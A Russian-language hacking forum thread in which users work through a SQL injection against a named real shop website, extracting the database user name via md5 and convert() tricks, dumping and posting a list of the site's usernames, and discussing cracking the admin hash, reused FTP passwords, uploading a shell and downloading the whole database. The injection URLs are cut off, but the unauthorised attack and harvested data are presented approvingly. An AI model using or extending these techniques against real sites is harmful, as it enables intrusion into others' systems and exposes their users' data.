• XSS.stack #1 – первый литературный журнал от юзеров форума

Вывод информации в sql-инъекции

sensei

CD-диск
Пользователь
Регистрация
20.10.2006
Сообщения
16
Реакции
0
В найденной sql инъекции
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

при попытке вывода информации, вопреки многим статьям, описывающие sql инъекции получаем ошибку
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

и так
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

как же нам все-таки получить имя пользователя?
Поможет функция md5:
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

однако ж подбор полного имени займет большое количество драгоценного времени
а такой запрос
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

вернет хэш первых трех букв. Далее следует логическое продолжение
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

и так далее до полного раскрытия имени.

Если кому-то эта информация кажется не новой, просьба не ругать, а дать ссылки на статьи в которых показана такая техника

вывода информации.

И дополнительно,
как получить пароль пользователя, если нет прав на доступ к таблице mysql и на использование функции LOAD_FILE()? Ведь знание одного только имени ничего не дает.
 
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*

при попытке вывода информации, вопреки многим статьям, описывающие sql инъекции получаем ошибку
http://www.ctella.ru/index.php?sAction=cat...from%20goods1/*
дык а подбирать число столбцов за тебя кто будет? Там же всё написано:

The used SELECT statements have a different number of columns
вроде, ничего не понятного тут нет
 
там кстати два запроса. в одном 1 колонка, в другом три.

вот нужный запрос кстати:
http://www.ctella.ru/index.php?sAction=cat...g%20utf8),0/*

показывает имя юзера тут:
/ Фото & Видео / 1gb_ctella@10.0.1.15
Добавлено в [time]1161694494[/time]
Список юзеров :P
http://www.ctella.ru/index.php?sAction=cat...0FROM%20users/*

amba / Krista / vam / SoftLine / troshin / efir / T-land / ctella / dondok / iloveyougently / ssparrow / tnt / StaZ / pedvor / alexas / anderev / compmatrix / Scorpion / VASCA / genius / hawk
Добавлено в [time]1161694655[/time]
пипец =\ там все дырявое нахер
 
2 Great: thanx за функцию convert() - я с этим md5() задолбался (вот что делает с людьми отсутствие знаний).
И все же рассмотрен случай при котором есть таблица с пользователями. Вопрос в конце поста остается в силе.
 
sql инъекция бесполезная вещь
кто тебе сказал такую ерунду !!! у-у-у я его ... :nono:
там можно теоретическии залить шелл :baby: но это бывает очень редко (если разрешена запись)
ну и если в админку попал то там иногда тож шелл мона залить )
 
sql инъекция бесполезная вещь
Если удастся расшифровать хэш админского паса, то вполне вероятно, что будет у тебя и фтп - на все может тупо стоять один пароль...
 
таких админов уже не найдешь))

Ну почему же, я довольно часто с такими сталкивался :)
Добавлено в [time]1161852846[/time]
sensei

Можешь попробовать слить базу.
 
Если сайт не хостится у кого-нибудь, а стоит на отдельном сервере - тогда часто. Иначе - шансов почти нет. Для чего качать базу? Все что нужно - хэш админа (хотя даже он не нужен, если выполнить запрос Great'а).
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх